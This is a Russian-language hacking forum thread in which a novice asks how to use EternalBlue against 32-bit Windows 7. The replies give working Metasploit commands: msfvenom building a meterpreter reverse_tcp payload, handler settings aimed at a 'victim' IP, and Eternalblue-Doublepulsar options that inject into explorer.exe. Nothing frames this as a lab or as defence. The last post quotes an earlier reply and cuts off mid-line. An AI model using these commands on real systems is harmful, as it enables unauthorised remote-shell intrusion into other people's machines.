• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Проблема Kali Linux: Eternalblue x86

Sagain2

Sagain2

New member
30.04.2019
4
0
(Ребята, только не бейте, я новичек)
Даров, хацкеры. У меня тут возник вопрос. Большая часть эксплоитов в metasploit-framework заточены под windows (7) x64
Теперь встречный вопрос, есть ли эксплоит для windows 7 x86? Пол инета облазил не нашел.
Ну или есть его заменители?

R

rdh_x

Well-known member
26.03.2018
48
3
Генеришь нагрузку
Bash:
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.X.X >> payload.exe
Далее в msfconsole
Bash:
use exploit/multi/handler
set lhost <твой ip>
set rhost <ip жертвы>
set payload windows/meterpreter/reverse_tcp
run

R

rdh_x

Well-known member
26.03.2018
48
3
Прошу прощения, изначально подумал что неправильно понял вопрос и удалил свой правильный ответ.

Для 32-бит есть Doublepulsar, в настройках сплоита
Код:
set targetarcheticture x84
И нужно изменить processinject, попробуйте поэксперементировать с разными процессами, я пробовал explorer.exe но иногда соединение падало.
Код:
set processinject explorer.exe
Также на некоторых процессах нельзя повысить привилегии.
И соответственно вместо
Код:
set payload windows/x64/meterpreter/reverse_tcp
Нужно
Код:

s unity

s unity

Премиум
18.09.2019
110
8
Прошу прощения, изначально подумал что неправильно понял вопрос и удалил свой правильный ответ.

Для 32-бит есть Doublepulsar, в настройках сплоита
Код:
set targetarcheticture x84
И нужно изменить processinject, попробуйте поэксперементировать с разными процессами, я пробовал explorer.exe но иногда соединение падало.
Код:
set processinject explorer.exe
Также на некоторых процессах нельзя повысить привилегии.
И соответственно вместо
Код: